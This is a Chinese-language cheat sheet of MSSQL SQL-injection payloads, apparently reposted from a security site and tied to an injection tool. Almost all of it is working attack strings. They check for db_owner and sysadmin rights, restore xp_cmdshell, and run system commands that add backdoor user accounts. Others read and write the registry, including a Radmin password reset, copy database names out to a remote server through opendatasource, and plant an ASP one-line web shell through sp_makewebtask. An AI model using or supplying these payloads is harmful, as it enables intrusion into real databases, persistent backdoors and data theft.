//看看是什么权限的
and 1=(Select IS_MEMBER(’db_owner’))
And char(124)%2BCast(IS_MEMBER(’db_owner’) as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS(’master’))
And char(124)%2BCast(HAS_DBACCESS(’master’) as varchar(1))%2Bchar(124)=1 --

数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
’ and char(124)%2Buser%2Bchar(124)=0 and ’’=’

搜索类型
’ and char(124)%2Buser%2Bchar(124)=0 and ’%’=’

爆用户名
and user>0
’ and user>0 and ’’=’

检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
and exists (select * from sysobjects);--

检测是否支持多行
;declare @d int;--

恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc ’xp_cmdshell’,’xplog70.dll’;--

select * from openrowset(’sqloledb’,’server=192.168.1.200,1433;uid=test;pwd=pafpaf’,’select @@version’)

//-----------------------
//      执行命令
//-----------------------
首先开启沙盘模式:
exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Jet/4.0/Engines’,’SandBoxMode’,’REG_DWORD’,1

然后利用jet.oledb执行系统命令
select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=c:/winnt/system32/ias/ias.mdb’,’select shell("cmd.exe /c net user admin admin1234 /add")’)

执行命令
;DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C:/WINNT/system32/cmd.exe /c net user paf pafpaf /add’;--

EXEC [master].[dbo].[xp_cmdshell] ’cmd /c md c:/1111’

判断xp_cmdshell扩展存储过程是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ’X’ AND name = ’xp_cmdshell’)

写注册表
exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Jet/4.0/Engines’,’SandBoxMode’,’REG_DWORD’,1

REG_SZ

读注册表
exec master..xp_regread ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon’,’Userinit’

读取目录内容
exec master..xp_dirtree ’c:/winnt/system32/’,1,1

数据库备份
backup database pubs to disk = ’c:/123.bak’

//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,’新密码’,’sa’

添加和删除一个SA权限的用户test:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句: 
exec sp_dropextendedproc ’xp_cmdshell’

添加扩展存储过过程
EXEC [master]..sp_addextendedproc ’xp_proxiedadata’, ’c:/winnt/system32/sqllog.dll’ 
GRANT exec On xp_proxiedadata TO public

停掉或激活某个服务。

exec master..xp_servicecontrol ’stop’,’schedule’
exec master..xp_servicecontrol ’start’,’schedule’

dbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails ’C:/Inetpub/wwwroot/SQLInject/login.asp’

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。

dbo.xp_makecab
’c:/test.cab’,’mszip’,1,
’C:/Inetpub/wwwroot/SQLInject/login.asp’,
’C:/Inetpub/wwwroot/SQLInject/securelogin.asp’

xp_terminate_process

停掉某个执行中的程序,但赋予的参数是 Process ID。
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID

xp_terminate_process 2484

xp_unpackcab

解开压缩档。

xp_unpackcab ’c:/test.cab’,’c:/temp’,1

某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite ’HKEY_LOCAL_MACHINE’,’SYSTEM/RAdmin/v2.0/Server/Parameters’,’Parameter’,’REG_BINARY’,0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite ’HKEY_LOCAL_MACHINE’,’SYSTEM/RAdmin/v2.0/Server/Parameters’,’port’,’REG_BINARY’,0xd20400 则端口值改为1234

create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
insert into opendatasource(’sqloledb’,’server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx’).lcx.dbo.ku select name from master.dbo.sysdatabases

//在Master中创建表,看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马:
’’%20’">http://127.0.0.1/dblogin123.asp?username=123’;exec%20sp_makewebtask%20’d:/www/tt/88.asp’,’%20select%20’’<%25execute(request("a"))%25>’’%20’;--

//更新表内容
Update films SET kind = ’Dramatic’ Where id = 123

//删除内容
delete from table_name where Stockid = 3

本篇文章来源于 安防快线 (www.sec520.com) 原文出处:http://www.sec520.com/Article/2008/200811/1379.html

阿D SQL注入工具常用的一些注入命令相关推荐

  1. 【Android 逆向】Android 进程注入工具开发 ( 远程进程注入动态库文件操作 | 注入动态库 加载 业务动态库 | 业务动态库启动 | pthread_create 线程开发 )

    文章目录 前言 一.加载 libnattive.so 动态库 二. libnattive.so 动态库启动 三. pthread_create 线程开发 四. 线程执行函数 前言 libbridge. ...

  2. 【Android 逆向】Android 进程注入工具开发 ( 远程进程 注入动态库 文件操作 | Android 进程读取文件所需的权限 | fopen 打开文件标志位 | 验证文件权限 )

    文章目录 前言 一.Android 进程读取文件所需的权限 二.fopen 打开文件标志位 三.验证文件权限 前言 一.Android 进程读取文件所需的权限 通过 注入工具 , 将 libbridg ...

  3. 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 注入工具收尾操作 | 关闭注入的动态库 | 恢复寄存器 | 脱离远程调试附着 )

    文章目录 一.dlclose 函数简介 二.关闭注入的 libbridge.so 动态库 三.恢复寄存器 四.脱离远程调试附着 一.dlclose 函数简介 dlclose 函数的作用是 卸载一个 指 ...

  4. 【Android 逆向】Android 进程注入工具开发 ( SO 进程注入环境及 root 权限获取 | 进程注入时序分析 )

    文章目录 一.SO 进程注入环境及 root 权限获取 二.进程注入时序分析 一.SO 进程注入环境及 root 权限获取 SO 注入的前提必须有 root 权限 , 有了 root 权限后 , 才能 ...

  5. php xpath注入工具,科普:XPATH注入

    用这个网站做示例 Default http://91ri.org/ newsdetail.php?id=51 1 http://91ri.org/ newsdetail.php?id=51 1.查看数 ...

  6. 常用的一些注入命令!!!

    常用的一些注入命令!!! //看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owne ...

  7. linux 网络安全工具,常用的Linux网络安全工具简介

    常用的Linux网络安全工具简介 互联网   发布时间:2008-10-08 22:12:04   作者:佚名   我要评论 常用的Linux网络安全工具简介 尽管各种版本的Linux distrib ...

  8. 【Android 逆向】Android 进程注入工具开发 ( 总结 | 源码编译 | 逆向环境搭建使用 | 使用进程注入工具进行逆向操作 ) ★★★

    文章目录 一.Android 进程注入工具开发系列博客 二.Android 进程注入工具 源码下载编译 三.逆向环境搭建 四.使用注入工具进行逆向操作 1.获取远程进程号 2.注入工具准备 3.注入动 ...

  9. 常用的一些注入命令,方便一下大家哦

    //看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varcha ...

最新文章

  1. 【DOM编程艺术】动态创建标记(签)---创建和插入节点
  2. 【React组件】写一个模仿蓝湖的图片查看器
  3. Linux route命令详解和使用示例(查看和操作IP路由表)
  4. Boostrap技能点整理之【bootstrap简介】
  5. 呼吁开放外网_服装数据集:呼吁采取行动
  6. 配合OAuth2进行单设备登录拦截
  7. xss过滤器无法处理ajax请求_thunkPHP 预防XSS攻击
  8. python读取excel写入mysql_python读取excel写入mysql
  9. I.MX6 dhcpcd 需要指定网卡
  10. mc pe linux服务器地址,我的世界手机版服务器地址大全 我的世界PE服务器IP和端口一览...
  11. python数据建模优缺点_Python数据分析\建模入门建议
  12. matlab自回归模型AIC,时间序列笔记-自回归模型(二)
  13. mysql实现跨库多表查询
  14. 链接mysql 504_phpMyAdmin错误代码:504 MySQL查询
  15. ORACLE RAC 一节点出现Suspending MMON slave action kewrmrfsa_ for 82800 seconds
  16. 【iOS】AFNetworking
  17. 麻省理工MIT计算机课程表
  18. python变量的使用_python变量赋值的几种形式细节
  19. 如意验证对接TV 神,马搭建 源码,搭建简单,仅供学习交流
  20. 【CEC2017】CEC2017优化算法目标测试函数综述以及CEC2017的matlab实现

热门文章

  1. 7.STM32C8T6+DHT11在OLED上显示 温度,湿度
  2. Aurora 8b/10b 协议和IP核设置
  3. 计算机html大作业聊天室,java大作业设计报告-JAVA聊天室.docx
  4. Linux内网离线安装nginx(rpm包安装方式)
  5. C语言编程-百钱百鸡问题
  6. 你知道什么是软中断吗?
  7. Linux/Ubuntu 18.04 截图软件Shutter详细教程,包括启用图片编辑Edit功能,延时截图等
  8. 修改gif图片文件大小
  9. 在linux下使用rpm命令安装软件
  10. 思维导图Java篇(一)